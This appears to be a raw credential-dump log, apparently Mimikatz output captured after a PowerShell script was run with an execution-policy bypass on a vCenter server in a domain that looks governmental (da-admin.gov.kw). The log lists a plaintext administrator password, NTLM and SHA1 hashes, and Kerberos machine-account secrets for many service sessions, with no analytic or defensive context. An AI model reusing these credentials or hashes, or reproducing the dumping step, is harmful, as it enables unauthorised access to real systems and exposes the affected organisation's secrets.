
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * Password : D@.Vc3nt3r@dm1n
	 
	 
	 
Command:> powershell.exe -exec bypass -file c:\Users\Public\Public_Data\files\mn.ps1


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>powershell.exe -exec bypass -file c:\Users\Public\Public_Data\files\mn.ps1 2>&1
Update-ExeFunctions : Cannot bind argument to parameter 'ExeArguments' because 
it is an empty string.
At line:2359 char:140
+ ...  -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
+                    ~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Update-ExeFunctions], Paramete 
   rBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAl 
   lowed,Update-ExeFunctions
 
20
Authentication Id : 0 ; 889548 (00000000:000d92cc)
Session           : Service from 0
User Name         : vmware-vpx-workflow
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 14/12/2017 03:35:05
SID               : S-1-5-80-392364437-2094601967-3056258832-3779639104-2648112118
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 827388 (00000000:000c9ffc)
Session           : Service from 0
User Name         : EsxAgentManager
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 14/12/2017 03:35:02
SID               : S-1-5-80-913761034-3588477003-4168234242-3034909407-2313380003
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 131484 (00000000:0002019c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:26
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DA-ADMIN-VC$
Domain            : DA-ADMIN
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:26
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : da-admin-vc$
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:26
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 1742625155 (00000000:67de5983)
Session           : NetworkCleartext from 0
User Name         : vcenteradmin
Domain            : DA-ADMIN
Logon Server      : DC
Logon Time        : 30/12/2017 10:17:07
SID               : S-1-5-21-2515415950-3022153381-902338616-1110
	msv :	
	 [00000003] Primary
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	tspkg :	
	wdigest :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 183005 (00000000:0002cadd)net



Session           : Service from 0
User Name         : MSSQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:33
SID               : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 830466 (00000000:000cac02)
Session           : Service from 0
User Name         : vdcs
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 14/12/2017 03:35:02
SID               : S-1-5-80-2376050832-1002644546-3219563763-1897071997-1638720473
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DA-ADMIN-VC$
Domain            : DA-ADMIN
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:23
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : da-admin-vc$
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 242417584 (00000000:0e72ffb0)
Session           : RemoteInteractive from 2
User Name         : Administrator
Domain            : DA-ADMIN
Logon Server      : DA-ADC
Logon Time        : 16/12/2017 09:01:25
SID               : S-1-5-21-2515415950-3022153381-902338616-500
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 104203 (00000000:0001970b)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:24
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 1742949590 (00000000:67e34cd6)
Session           : NetworkCleartext from 0
User Name         : vcenteradmin
Domain            : DA-ADMIN
Logon Server      : DC
Logon Time        : 30/12/2017 10:21:08
SID               : S-1-5-21-2515415950-3022153381-902338616-1110
	msv :	
	 [00000003] Primary
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	tspkg :	
	wdigest :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 900131 (00000000:000dbc23)
Session           : Service from 0
User Name         : VServiceManager
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 14/12/2017 03:35:06
SID               : S-1-5-80-1755583008-3639604732-3297581049-4290228692-1647087913
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 290669 (00000000:00046f6d)
Session           : Service from 0
User Name         : VMwareComponentManager
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 14/12/2017 03:33:03
SID               : S-1-5-80-3372768379-3819321400-346334875-1038760566-4152303776
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 178688 (00000000:0002ba00)
Session           : Service from 0
User Name         : MsDtsServer120
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:31
SID               : S-1-5-80-3642287774-1615985598-572449333-1370030010-3123895339
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 1742893614 (00000000:67e2722e)
Session           : NetworkCleartext from 0
User Name         : vcenteradmin
Domain            : DA-ADMIN
Logon Server      : DC
Logon Time        : 30/12/2017 10:20:24
SID               : S-1-5-21-2515415950-3022153381-902338616-1110
	msv :	
	 [00000003] Primary
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	tspkg :	
	wdigest :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 974120 (00000000:000edd28)
Session           : Service from 0
User Name         : vmware-perfcharts
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 14/12/2017 03:35:13
SID               : S-1-5-80-3546650958-3015076157-2362867254-1995329034-1174310677
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 907115 (00000000:000dd76b)
Session           : Service from 0
User Name         : vspherewebclientsvc
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 14/12/2017 03:35:06
SID               : S-1-5-80-1390672030-1570625433-3588235971-2765240717-2853868233
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 392936 (00000000:0005fee8)
Session           : Service from 0
User Name         : vapiEndpoint
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 14/12/2017 03:33:28
SID               : S-1-5-80-1400295921-1914573544-2375097730-2613573796-360085657
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 223958 (00000000:00036ad6)
Session           : Service from 0
User Name         : SQLSERVERAGENT
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:45
SID               : S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

Authentication Id : 0 ; 131469 (00000000:0002018d)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 14/12/2017 03:32:26
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * NTLM     : 0963ecb1e5cb21839d31e59cc8669960
	 * SHA1     : 356a868c722b8ee2d05eff6d872b84b485f92ad8
	tspkg :	
	wdigest :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DA-ADMIN-VC$
	 * Domain   : da-admin.gov.kw
